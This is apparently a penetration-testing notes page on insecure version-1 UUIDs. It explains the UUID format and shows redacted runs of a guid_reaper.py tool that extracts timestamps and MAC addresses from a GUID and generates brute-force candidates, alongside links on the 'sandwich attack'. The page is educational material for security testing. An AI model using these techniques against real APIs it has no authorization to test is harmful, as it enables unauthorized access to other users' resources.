Insecure UUID

Version 1

12345678 - abcd - 1a56 - a539 - 103755193864

xxxxxxxx - xxxx - Mxxx - Nxxx - xxxxxxxxxxxx

• The position of the M Indicates the UUID version. In the example above, it’s UUID v1.

• The position of the N Indicates the UUID variant.

Attacking predictable GUIDs when hacking APIsDana Epp's Blog

$ python3 guid_reaper.py -d da***4ad-9**7-1**f-8**6-02*******016
GUID version: 1
Time: 2024-*1-0* 05:36:06.444766
Timestamp: 13<-SNIP->661
Node: 248<-SNIP->374
MAC address: 02:42:<-SNIP->:16
Clock sequence: 2**2

$ python3 guid_reaper.py -t '2024-1*-0* 0*:0*:2*' da***4ad-9**7-1**f-8**6-02*******016 > guid.txt

Bruteforce

UUID Insecurities - HackTricksbook.hacktricks.xyz

Sandwich Attack

GitHub - Lupin-Holmes/sandwichGitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Hacking APIs: Breaking Web Application Programming Interfaces A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.

• Black Hat GraphQL: Attacking Next Generation APIs This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.